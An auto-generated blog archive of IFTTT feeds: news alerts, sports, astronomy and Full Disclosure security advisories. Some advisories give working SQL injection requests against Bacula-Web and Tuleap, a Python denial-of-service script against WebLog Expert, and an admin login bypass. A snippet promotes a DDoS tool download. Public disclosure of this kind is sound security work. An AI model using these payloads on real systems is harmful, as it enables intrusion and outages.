Patrick McGuire: 2018-03-04

Saturday, March 10, 2018

Anonymous Creativity

Anonymous Creativity. Have you ever thought about it? We want to be famous as a writer, as a poet, as a painter, as a politician, as a singer, or what you will. Why? Because we really don't love what we are doing. If you loved to sing, or to paint, or to write poems, if you really loved it you would not be ...

from Google Alert - anonymous http://ift.tt/2FHkWsE
via IFTTT

telegram anonymous chat

Chat with strangers at random in private chat rooms. This was first published on the Online Journalism Blog. Get for Telegram. Hi, I'm AnonyMeet, I'm designed to associate anonymous chats through a special algorithm. You are invited to the group Hhhhhhh. Pin sidebar. 8chan /zoo/ - Zoophilia ...

from Google Alert - anonymous http://ift.tt/2DgF53a
via IFTTT

Anonymous pastebin

bloomberg. g. The first pastebin was the eponymous pastebin. Xyz - Anonymous PasteBin Alternative Menu. On Monday After reports that Pastebin was handing over IP addresses to authorities, Anonymous teamed up with the People Liberation Front to create a Pastebin alternative. NSA collects Big ...

from Google Alert - anonymous http://ift.tt/2p4BAbn
via IFTTT

Anonymous ddos attack download

Anonymous LOIC tool for DDOS attack. DDOs attack with Anonymous Attacker Package - tutorial (xrhstos full download Anonymous LOIC tool for DDOS attackTorrent name:Anonymous LOIC tool for DDOS attackSeeds:8Leechers:0Health: Total size:130 KBTorrent added:2012-07-02 11 Play, streaming, ...

from Google Alert - anonymous http://ift.tt/2IhCMku
via IFTTT

Friday, March 9, 2018

Disable creator/editor fields for a survey shared to a group or organization for anonymous survey

I'm creating a safety survey for my organization to capture near miss incidents. I would like the survey to be submitted anonymously. Is there a way to disable the capture of creator/editor fields? I have disabled tracking in the feature service settings, but the creator/editor fields are still displayed in the data ...

from Google Alert - anonymous http://ift.tt/2DfvB8u
via IFTTT

APT Hackers Infect Routers to Covertly Implant Slingshot Spying Malware

Security researchers at Kaspersky have identified a sophisticated APT hacking group that has been operating since at least 2012 without being noticed due to their complex and clever hacking techniques. The hacking group used a piece of advanced malware—dubbed Slingshot—to infect hundreds of thousands of victims in the Middle East and Africa by hacking into their routers. According to a

from The Hacker News http://ift.tt/2Fu8KIc
via IFTTT

GlobaLeaks The Software Enabling Secure and Anonymous

GlobaLeaks The Software Enabling Secure and Anonymous.

from Google Alert - anonymous http://ift.tt/2DewXQW
via IFTTT

Single mother by anonymous sperm donor no dad needed

Many single women use known or anonymous donors through sperm banks by a single mother. Dudum's father I want my kids to have always known they have a donor, not a dad. What follows is a guide to using donor sperm for recipients, with the requirements to use donor sperm cells, the types of ...

from Google Alert - anonymous http://ift.tt/2IcgAYV
via IFTTT

Anonymous Recruiter

View details and apply for this general manager job in South East London (SE10) with Anonymous Recruiter on Caterer.com. We are looking for a passionate and motivated general manager who is looking for a new challenge to take our business to the next level.

from Google Alert - anonymous http://ift.tt/2FqIHG4
via IFTTT

ISPs Caught Injecting Cryptocurrency Miners and Spyware In Some Countries

Governments in Turkey and Syria have been caught hijacking local internet users' connections to secretly inject surveillance malware, while the same mass interception technology has been found secretly injecting browser-based cryptocurrency mining scripts into users' web traffic in Egypt. Governments, or agencies linked to it, and ISPs in the three countries are using Deep Packet Inspection

from The Hacker News http://ift.tt/2DdWud1
via IFTTT

Orioles: Manny Machado on list of players we'd love to see in Aaron Judge-less HR Derby field - Buster Olney (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] DSA-2018-020: Dell EMC Data Protection Advisor Hardcoded Password Vulnerability

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple SQL injection vulnerabilities in Bacula-Web (CVE-2017-15367)

Title: Multiple SQL injection vulnerabilities in Bacula-Web (CVE-2017-15367) Credit: Gustavo Sorondo / http://ift.tt/2tvmReT Vendor/Product: Bacula-Web (http://bacula-web.org/) Vulnerability: SQL injection Vulnerable version: All prior to 8.0.0-RC2. Fixed in: 8.0.0-RC2 CVE: CVE-2017-15367 ## Vulnerability Details Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection vulnerabilities that could allow an attacker to access the Bacula database and, depending on configuration, escalate privileges on the server. 1) The /jobs.php script is affected by a SQL Injection vulnerability. The following GET request can be used to extract the result of "select @@version" query. Request: GET /jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1 Response: HTTP/1.1 200 OK [...]

5.7.19-0ubuntu0.16.04.1

backupjob-report.php?backupjob_name= [...] Other parameters (eg. client_id) are also vulnerable, since there is no protection against SQL Injections at all. 2) The /backupjob-report.php script is affected by a SQL Injection vulnerability. The following GET request can be used to extract the result of "select @@version" query. Request: GET /client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23 3) The /client-report.php is affected by a SQL Injection vulnerability in the "client_id" parameter. ## Vulnerability Disclosure Timeline 2017-08-01 - Vulnerabilities discovered by Cinta Infinita 2017-08-09 - Vulnerabilities reported to Bacula-Web 2017-08-09 - Vulnerabilities confirmed by Bacula-Web 2017-10-15 - CVE-2017-15367 is assigned 2017-10-16 - Bacula-Web fixes backupjob-report.php and client-report.php in dev branch 2018-03-02 - Bacula-Web fixes jobs.php in dev branch 2018-03-02 - Version 8.0.0-RC2 is published 2018-03-07 - Full disclosure ## Related fixes and releases http://ift.tt/2oXQT6l http://ift.tt/2Hk6fbV http://ift.tt/2oZ5Yo4 ## About Cinta Infinita Cinta Infinita offers Information Security related services. Our Headquarters are in Buenos Aires, Argentina. For more information, visit http://ift.tt/2tu3iUd

Source: Gmail -> IFTTT-> Blogger

[FD] Hola VPN 1.79.859 - Insecure service permissions

=====[ Tempest Security Intelligence - ADV-22/2018 ]=== Hola VPN 1.79.859 - Insecure service permissions

Source: Gmail -> IFTTT-> Blogger

[FD] WPS Free Office 10.2.0.5978 - NULL DACL grants full access

=====[ Tempest Security Intelligence - ADV-16/2018 ]=== WPS Free Office 10.2.0.5978 - NULL DACL grants full access

Source: Gmail -> IFTTT-> Blogger

[FD] Panda Global Security 17.0.1 - NULL DACL grants full access

=====[ Tempest Security Intelligence - ADV-17/2018 ]=== Panda Global Security 17.0.1 - NULL DACL grants full access

Source: Gmail -> IFTTT-> Blogger

School district takes down anonymous tip line

After two anonymous calls to the school district over student safety concerns proved a dead end for law enforcement, Superintendent Monte Woolstenhulme said this week that the tip line has.

from Google Alert - anonymous http://ift.tt/2tz8kii
via IFTTT

[FD] Panda Global Security 17.0.1 - Unquoted service path

=====[ Tempest Security Intelligence - ADV-18/2018 ]=== Panda Global Security 17.0.1 - Unquoted service path

Source: Gmail -> IFTTT-> Blogger

[FD] BitDefender Total Security 2018 - Insecure Pipe Permissions

=====[ Tempest Security Intelligence - ADV-19/2018 ]=== BitDefender Total Security 2018 - Insecure Pipe Permissions

Source: Gmail -> IFTTT-> Blogger

[FD] 10-Strike Network Monitor 5.4 - Unquoted Service Path

=====[ Tempest Security Intelligence - ADV-20/2018 ]=== 10-Strike Network Monitor 5.4 - Unquoted Service Path

Source: Gmail -> IFTTT-> Blogger

[FD] WebLog Expert Web Server Enterprise v9.4 / Remote Denial Of Service CVE-2018-7582

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2oXF9ka [+] ISR: Apparition Security Vendor: ======= www.weblogexpert.com Product: ========= WebLog Expert Web Server Enterprise v9.4 WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts. Vulnerability Type: =================== Denial Of Service CVE Reference: ============== CVE-2018-7582 Security Issue: ================ WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept Header to TCP port 9991. (e7c.1750): CLR exception - code e0434352 (first/second chance not available) eax=00000000 ebx=06d1d098 ecx=00000005 edx=00000000 esi=00000002 edi=00000000 eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!NtWaitForMultipleObjects+0x15: 778d016d 83c404 add esp,4 Exploit/POC: ============= import socket print 'Weblog Expert Server / Denial Of Service' print 'hyp3rlinx' IP='Weblog Expert Server IP' PORT=9991 PAYLOAD="GET /index.html HTTP/1.0 Host: +'IP'+':9991 User-Agent: Mozilla Accept: */*" + "A"*2000+'\r\n\r\n' s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((IP,PORT)) s.send(PAYLOAD) s.close() Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: February 3, 2018 Second attempt : February 17, 2018 March 7, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

[FD] Tuleap SQL Injection

=============================================================================== title: Tuleap SQL Injection case id: CM-2018-01 product: Tuleap version 9.17.99.189 vulnerability type: Blind SQL injection - time based severity: High found: 2018-02-24 by: Cristiano Maruti (@cmaruti) =============================================================================== [EXECUTIVE SUMMARY] Enalean Tuleap is a project management system for application lifecycles management, agile development and design projects, requirement management, IT services management, and so on. The analysis discovered a time-based blind SQL injection vulnerability (OTG-INPVAL-005) in the tracker functionality of Tuleap software engineering platform. A malicious user can inject arbitrary SQL commands to the application. The vulnerability lies in the project tracker service search functionality; depending on project visibility successful exploitation may or may not require user authentication. A successful attack can read, modify or delete data from the database or, depending on the privilege of the user (default: restricted) and the database engine in use (default: MySQL), execute arbitrary commands on the underlying system. [VULNERABLE VERSIONS] The following version of the Tuleap software was affected by the vulnerability; previous versions may be vulnerable as well: - Tuleap version 9.17.99.189 [TECHNICAL DETAILS] It is possible to reproduce the vulnerability following these steps: 1. Open the tracker service in a publicly visible project 2. Leave all the fields empty and submit the search form while logging the request with the help of an application proxy like Burp or ZAP 3. Copy the previous request and edit the "criteria[499][values][]" field in the request body with the "(select(0)from(select(sleep(3)))a)/**/" payload 4. Send the request to the application 5. Application will respond with a three second delay Below a full transcript of the HTTP request used to raise the vulnerability and also a cURL one liner to highlight the induced delay in the application response. HTTP Request

Source: Gmail -> IFTTT-> Blogger

[FD] WebLog Expert Web Server Enterprise v9.4 / Authentication Bypass CVE-2018-7581

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2txAxWM [+] ISR: Apparition Security Vendor: ======== www.weblogexpert.com Product: ======== WebLog Expert Web Server Enterprise v9.4 WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts. Vulnerability Type: =================== Authentication Bypass CVE Reference: ============== CVE-2018-7581 Security Issue: ================ The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4 has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin. A standard non Windows Administrator user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer" set to a cleartext password and login as admin. e.g. C:\ProgramData\WebLog Expert\WebServer>cacls * | more C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C BUILTIN\Administrators:(ID)C NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F Exploit/POC: ============= Login as a 'Standard' Windows user Comment out the Admin hashed password using ';' then add any cleartext password as follows. [User:admin] Password=1234 ;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0 bAllProfiles=1 Now login in as Admin! :) Network Access: =============== Local Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: March 1, 2018 No replies from previous attempts March 7, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

NFL Free Agency: Best and worst case scenarios for Ravens and rest of the league - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

waa %28we architech anonymous

Company: waa %28we architech anonymous. waa (we architech anonymous) logo · Beijing, China · Architect/senior architectural assistant at waa (we architech anonymous). An opportunity for an architect/senior architectural assistant is available at Bejing-based firm waa. More. 9 March 2018 Tags: ...

from Google Alert - anonymous http://ift.tt/2oX2YIP
via IFTTT

ISS Daily Summary Report – 3/08/2018

Plant Gravity Perception (PGP): Today the crew replaced four of the European Modular Cultivation System (EMCS) Experiment Containers (ECs) for the next Plant Gravity Perception experiment run. Two of the ECs powered up and remained powered. For this investigation, normal and mutated forms of thale cress, a model research plant, are germinated to support the … Continue reading

from ISS On-Orbit Status Report http://ift.tt/2HkY2Vd
via IFTTT

Over 15,000 Memcached DDoS Attacks Hit 7100 Sites in Last 10 Days

Memcached reflections that recently fueled two most largest amplification DDoS attacks in the history have also helped other cybercriminals launch nearly 15,000 cyber attacks against 7,131 unique targets in last ten days, a new report revealed. Chinese Qihoo 360's Netlab, whose global DDoS monitoring service 'DDosMon' initially spotted the Memcached-based DDoS attacks, has published a blog

from The Hacker News http://ift.tt/2FuVqn4
via IFTTT

Windows 10 'S Mode' Coming Soon — For Security and Performance

Microsoft has confirmed that the company is planning to convert Windows 10 S from a dedicated operating system to a special "S Mode" that will be available in all versions of Windows. Windows 10 S, a new operating system designed for simplicity, security, and speed, was released by Microsoft last year. It locks a computer down to run applications only downloaded from official Windows Store,

from The Hacker News http://ift.tt/2G8vm2b
via IFTTT

Horsehead: A Wider View

Combined image data from the massive, ground-based VISTA telescope and the Hubble Space Telescope was used to create this wide perspective of the interstellar landscape surrounding the famous Horsehead Nebula. Captured at near-infrared wavelengths, the region's dusty molecular cloud sprawls across the scene that covers an angle about two-thirds the size of the Full Moon on the sky. Left to right the frame spans just over 10 light-years at the Horsehead's estimated distance of 1,600 light-years. Also known as Barnard 33, the still recognizable Horsehead Nebula stands at the upper right, the near-infrared glow of a dusty pillar topped with newborn stars. Below and left, the bright reflection nebula NGC 2023 is itself the illuminated environs of a hot young star. Obscuring clouds below the base of the Horsehead and on the outskirts of NGC 2023 show the tell-tale far red emission of energetic jets, known as Herbig-Haro objects, also associated with newborn stars. via NASA http://ift.tt/2HkOLMJ

Thursday, March 8, 2018

anonymous galaxy

from Google Alert - anonymous http://ift.tt/2DbHnki
via IFTTT

Head Chef

View details and apply for this head chef hotel job in Boughton Lees, Ashford (TN25) with Anonymous Recruiter on Caterer.com. Head Chef- Deluxe Hotel 2AA rosette Restaurant – Kent circ£55k Head Chef- Basic salary of up £50k plus performance bonus and company package Our client is seeking a ...

from Google Alert - anonymous http://ift.tt/2G7YdDQ
via IFTTT

Plasterer in Chelmsford (CM1) | Anonymous

View details and apply for this plasterer job in Chelmsford (CM1) with Anonymous on totaljobs. An experienced plasterer is required to work within domestic properties, taking down ceilings and walls etc.

from Google Alert - anonymous http://ift.tt/2Fq0vgd
via IFTTT

How to set up a sweepstakes in an anonymous survey

We are often asked how to create a anonymous survey and let participants enter an optional drawing for prizes.

from Google Alert - anonymous http://ift.tt/2FnLpvO
via IFTTT

ISS Daily Summary Report – 3/07/2018

Airway Monitoring: In support of the European Space Agency (ESA) Airway Monitoring investigation, today the crew completed calibration of the hardware in the US Laboratory and then completed two different measurement protocols; the low Nitric Oxide (NO) protocol which determines how much NO is exhaled with respiration, and the high NO protocol, which determines how … Continue reading

from ISS On-Orbit Status Report http://ift.tt/2FzIkrU
via IFTTT

Alternatives to Alcoholics Anonymous Work as Well as 12-Step Programs

A new study comparing Alcoholics Anonymous (AA) to alternative mutual help groups find these groups perform about as well as 12-step programs, Vox reports. The study compared AA, the original 12-step program, with the three biggest alternative mutual help groups: Women for Sobriety, SMART ...

from Google Alert - anonymous http://ift.tt/2FBquVr
via IFTTT

New Cryptocurrency Mining Malware Infected Over 500,000 PCs in Just Few Hours

Two days ago, Microsoft encountered a rapidly spreading cryptocurrency-mining malware that infected almost 500,000 computers within just 12 hours and successfully blocked it to a large extent. Dubbed Dofoil, aka Smoke Loader, the malware was found dropping a cryptocurrency miner program as payload on infected Windows computers that mines Electroneum coins, yet another cryptocurrency, for

from The Hacker News http://ift.tt/2FE0rwI
via IFTTT

Hard-Coded Password in Cisco Software Lets Attackers Take Over Linux Servers

A medium yet critical vulnerability has been discovered in Cisco Prime Collaboration Provisioning software that could allow a local attacker to elevate privileges to root and take full control of a system. Cisco Prime Collaboration Provisioning (PCP) application allows administrators to remotely control the installation and management of Cisco communication devices (integrated IP telephony,

from The Hacker News http://ift.tt/2oZaLVT
via IFTTT

Why Jake Arrieta, Lance Lynn and Alex Cobb would be a good fit with Orioles - David Schoenfield (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities ...

Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities, lawyers say. Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities, lawyers say. Published on 2018-03-08By Paulina Dedaj ...

from Google Alert - anonymous http://ift.tt/2FszkkW
via IFTTT

Anonymous woman to donate roughly $250000 of $559 million Powerball winnings to charities ...

Anonymous woman to donate roughly $250,000 of $559 million Powerball winnings to charities, lawyers say. Anonymous woman to donate roughly $250,000 of $559 million Powerball winnings to charities, lawyers say. Published on 2018-03-07By Paulina Dedaj ...

from Google Alert - anonymous http://ift.tt/2Fiyrzo
via IFTTT

Anonymous

Intercollegiate YMCA · Flat Rock River YMCA Camp · YMCA Association Office · Youth Development YMCA. Anonymous. Home » Anonymous. Recent Posts. The New Pike Y | YMCA Ways to Give | OrthIndy Foundation | YMCA of Greater. Indiana Y's Announce Statewide Membership Reciprocity Plan.

from Google Alert - anonymous http://ift.tt/2FmvkXe
via IFTTT

[FD] [RT-SA-2018-001] Arbitrary Redirect in Tuleap

Advisory: Arbitrary Redirect in Tuleap RedTeam Pentesting discovered an arbitrary redirect vulnerability in the redirect mechanism of the application lifecycle management platform Tuleap. Details ======= Product: Tuleap Affected Versions: > 9.17.99.93 Fixed Versions: >= 9.17.99.93 Vulnerability Type: Arbitrary Redirect Security Risk: low Vendor URL: https://www.tuleap.org/ Vendor Status: fixed version released Vendor Issue URL: http://ift.tt/2G8SHko Advisory URL: http://ift.tt/2D8nYAM Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: http://ift.tt/1jQGmEN Introduction ============ "Tuleap is an open source tool for Scrum, Kanban, waterfall, requirement management. Plan, track, code and collaborate on software projects, you get everything at hand." (from the Tuleap website [1]) More Details ============ RedTeam Pentesting discovered an arbitrary redirect vulnerability in the way Tuleap handles redirects. Usually this function is only used in Tuleap after an successful login to assigned trackers, however the redirect can be used indepented of whether a user is authenticated to the application. While the application employs a URL filter to prevent arbitrary redirects, the URL filter can be bypassed. This allows attackers to redirect users to a different website, if a user opens an attacker prepared URL. The filter can be bypassed by using protocol relative URLs, which omit the leading protocol identifier. These arbitrary URLs are prefixed with two slashes, which instructs the browser to use the same protocol as the current page. This behaviour is specified in RFC 3986 [2] in section 5.4. Proof of Concept ================ The following URL to an example installation of Tuleap will redirect users to an attacker controlled website: http://ift.tt/2FsLnP6 Workaround ========== Currently no workaround is known. Fix === Upgrade to at least tuleap version 9.17.99.93. Security Risk ============= Attackers may convice users to use a prepared link to access a valid Tuleap instance, which then redirects users to a fake login page. This can greatly increase the effectiveness of phishing attacks and may allow attackers to steal user credentials more effectively. However, no credentials or sensitive information can be extracted directly. Furthermore, the website to which users are going to be redirected will be displayed in the browser location bar so that users may identify the attack. Therefore, we rate this vulnerability with a low risk. Nevertheless, it is very easy for attackers to identify this vulnerability and create malicious URLs, which makes it very likely that attackers might abuse this. Timeline ======== 2018-01-02 Vulnerability identified 2018-01-11 Customer approved disclosure to vendor 2018-02-13 Vendor notified 2018-02-14 Vendor released fixed version 2018-03-05 Vendor made issue public 2018-03-08 Advisory released References ========== [1] http://ift.tt/2G8SJsw [2] http://ift.tt/NUWxBd RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: http://ift.tt/1ixScMF Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: http://ift.tt/2uIYRk1

Source: Gmail -> IFTTT-> Blogger

Cyclones at Jupiter s North Pole

Juno's Jovian Infrared Auroral Mapper data was used to construct this stunning view of cyclones at Jupiter's North Pole. Measuring the thermal emission from Jovian cloud tops, the infrared the observations are not restricted to the hemisphere illuminated by sunlight. They reveal eight cyclonic features that surround a cyclone about 4,000 kilometers in diameter, just offset from the giant planet's geographic North Pole. Similar data show a cyclone at the Jovian South Pole with five circumpolar cyclones. The South Pole cyclones are slightly larger than their northern cousins. Cassini data has shown that gas giant Saturn's north and south poles each have a single cyclonic storm system. via NASA http://ift.tt/2Fq3HIN

Wednesday, March 7, 2018

Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities ...

Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities, lawyers say.

from Google Alert - anonymous http://ift.tt/2oThTE5
via IFTTT

8th St.'s surf is Good

March 07, 2018 at 07:00PM, the surf is Good!

8th St. Summary

Surf: head high to 2 ft overhead
Maximum: 2.142m (7.03ft)
Minimum: 1.53m (5.02ft)

Maryland-Delaware Summary

from Surfline http://ift.tt/1kVmigH
via IFTTT

Anonymous woman to donate roughly $250000 of $559 million Powerball winnings to charities ...

Anonymous woman to donate roughly $250000 of $559 million Powerball winnings to charities, lawyers say.

from Google Alert - anonymous http://ift.tt/2FmvCNN
via IFTTT

Anonymous Powerball Winner's Lawyers Announce Donation

Stream the WBZ NewsRadio 1030 - News Audio episode, Anonymous Powerball Winner's Lawyers Announce Donation, free & on demand on iHeartRadio.

from Google Alert - anonymous http://ift.tt/2DasUF5
via IFTTT

China Duke Kunshan University|Medical Physics

Time sort ascending · Referrer · User, Operations. 03/07/2018 - 18:21, node/4693/track, Anonymous, details. 03/07/2018 - 18:21, node/4693/track, Anonymous, details. 03/07/2018 - 18:20, node/4693/track, Anonymous, details. 03/06/2018 - 13:34, node/4693/track, Anonymous, details. 03/06/2018 - 06:56 ...

from Google Alert - anonymous http://ift.tt/2Fmvz4z
via IFTTT

Anonymous Donors Challenge Eagle Nation to Support Athletics' Endowments

The family, who wishes to remain anonymous, has challenged all of Eagle Nation to contribute to the sustainability of the Foundation and will match up to $750,000 in gifts made to the Coaches Continuity Fund or scholarship endowments that support Georgia Southern student-athletes who play in one ...

from Google Alert - anonymous http://ift.tt/2FlTnS9
via IFTTT

8th St.'s surf is Good

March 06, 2018 at 07:00PM, the surf is Good!

8th St. Summary

Surf: head high to 2 ft overhead
Maximum: 2.142m (7.03ft)
Minimum: 1.53m (5.02ft)

Maryland-Delaware Summary

from Surfline http://ift.tt/1kVmigH
via IFTTT

Memcached DDoS Exploit Code and List of 17,000 Vulnerable Servers Released

Someone has just released proof-of-concept (PoC) exploit code for amplification attack and a pre-compiled list of nearly 17,000 potential vulnerable Memcached servers on the Internet that could even allow script-kiddies to launch massive DDoS attacks using UDP reflections easily. Last week we saw two record-breaking DDoS attacks—1.35 Tbps hit Github and 1.7 Tbps attack against an unnamed

from The Hacker News http://ift.tt/2oOzGfw
via IFTTT

ISS Daily Summary Report – 3/06/2018

Airway Monitoring: In support of the European Space Agency (ESA) Airway Monitoring investigation, today the crew set up hardware in the US Laboratory for nitric oxide measurements to be taken tomorrow. Airway Monitoring aims to determine the pulmonary nitric oxide turnover in weightlessness and in combined weightless, hypobaric and hypoxic environments as well as determining … Continue reading

from ISS On-Orbit Status Report http://ift.tt/2G3tQOQ
via IFTTT

Predictions for every team's top free agent: Will Ravens re-sign C Ryan Jensen? (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Would Ravens shock everyone (including owner) and draft Baker Mayfield? - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter

Fly Me Away
Drone enthusiast. 26. Aerial photographer and lover of life.
Asheville, NC

Following: 1798 - Followers: 2302

March 07, 2018 at 05:59AM via Twitter http://twitter.com/KingQuadcopter

Leaked NSA Dump Also Contains Tools Agency Used to Track Other Hackers

A years ago when the mysterious hacking group 'The Shadow Brokers' dumped a massive trove of sensitive data stolen from the US intelligence agency NSA, everyone started looking for secret hacking tools and zero-day exploits. A group of Hungarian security researchers from CrySyS Lab and Ukatemi has now revealed that the NSA dump doesn't just contain zero-day exploits used to take control of

from The Hacker News http://ift.tt/2FvZGWr
via IFTTT

anonymous galaxy

from Google Alert - anonymous http://ift.tt/2Fz0JF6
via IFTTT

Finding Approximate Location of Anonymous Poster

Answered: Hi, an anonymous poster recently gave a bad review of my local pub. The Landlord thinks this review was posted by me and is giving me grief. The poster was showing as a mobile user. Is there any way that their approximate location when the post was...

from Google Alert - anonymous http://ift.tt/2HaQ3de
via IFTTT

Arcs, Jets, and Shocks near NGC 1999

This tantalizing array of nebulas and stars can be found about two degrees south of the famous star-forming Orion Nebula. The region abounds with energetic young stars producing jets and outflows that push through the surrounding material at speeds of hundreds of kilometers per second. The interaction creates luminous shock waves known as Herbig-Haro (HH) objects. For example, the graceful, flowing arc just right of center is cataloged as HH 222, also called the Waterfall Nebula. Seen below the Waterfall, HH 401 has a distinctive cone shape. The bright bluish nebula below and left of center is NGC 1999, a dusty cloud reflecting light from an embedded variable star. The entire cosmic vista spans over 30 light-years, near the edge of the Orion Molecular Cloud Complex some 1,500 light-years distant. via NASA http://ift.tt/2oPtLHf

Tuesday, March 6, 2018

The Taxes page is accessible over the web by anonymous

Under permissions only admin can access taxes. - The taxes page at admin/commerce/reports/tax is available to anonymous (rendered in non-admin theme, but site theme)

from Google Alert - anonymous http://ift.tt/2HaZYPL
via IFTTT

anonymous galaxy

from Google Alert - anonymous http://ift.tt/2oTkSeX
via IFTTT

Survey Monkey Anonymous Form

Submit Questions Anonymously.

from Google Alert - anonymous http://ift.tt/2IatVkw
via IFTTT

Anonymous - FOH & BOH Positions

Anonymous – FOH & BOH Positions. Posted on March 06, 2018. Opening in May! New year round Nantucket Restaurant looking to fill most BOH and FOH positions. Seasonal or year round employment available. Looking for fun and creative people to join their team as they take on their first Nantucket ...

from Google Alert - anonymous http://ift.tt/2Fnp1Pm
via IFTTT

[FD] CVE-2017-12544 XSS on HPE System Management Homepage v7.6.0.11 and minor

[FD] DSA-2018-011: RSA Identity Governance and Lifecycle Privilege Escalation Vulnerability

Source: Gmail -> IFTTT-> Blogger

[FD] DSA-2018-038: RSA Archer GRC Platform Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Rapid Scada - 5.5.0 - Insecure Permissions

=====[ Tempest Security Intelligence - ADV-21/2018 ]=== Rapid Scada - 5.5.0 - Insecure Permissions

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode Security Advisory: Magento Stored Cross-Site Scripting – Product Attributes

DefenseCode Security Advisory Magento Stored Cross-Site Scripting – Product Attributes Advisory ID: DC-2018-03-004 Advisory Title: Magento Stored Cross-Site Scripting – Product Attributes Advisory URL: http://ift.tt/2rhPqdW Software: Magento Version: Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, Magento 2.2 prior to 2.2.3 Vendor Status: Vendor contacted, vulnerability fixed Release Date: 06/03/2018 Risk: MEDIUM 1. General Overview =================== During the security audit of Magento Open Source 2 a stored cross-site scripting vulnerability was discovered that could lead to administrator account takeover by a lower privileged administrator, putting the website customers and their payment information at risk. 2. Software Overview ==================== Magento is an ecommerce platform built on open source technology which provides online merchants with a flexible shopping cart system, as well as control over the look, content and functionality of their online store. Magento offers powerful marketing, search engine optimization, and catalog-management tools. It is a leading enterprise-class eCommerce platform, empowering over 200,000 online retailers. Homepage: http://www.magento.com 3. Vulnerability Description ============================ During the security analysis of Magento Open Source 2 it was discovered that there is a stored cross-site scripting vulnerability present when an attribute value is set to a malicious JavaScript payload and added to a product. The payload will execute whenever a product is opened for editing, allowing a lower privileged admin with access to products and attributes to attack a higher privileged admin. 4. Solution =========== Vendor fixed the reported security issues and released a new version. All users are strongly advised to update to the latest available version. 5. Credits ========== Discovered by Bosko Stankovic (bosko@defensecode.com). 6. Disclosure Timeline ====================== 22/11/2017 Vendor contacted through Bugcrowd platform 27/11/2017 Vendor responded 28/02/2018 Vulnerability fixed 06/03/2018 Advisory released 7. About DefenseCode ==================== DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source 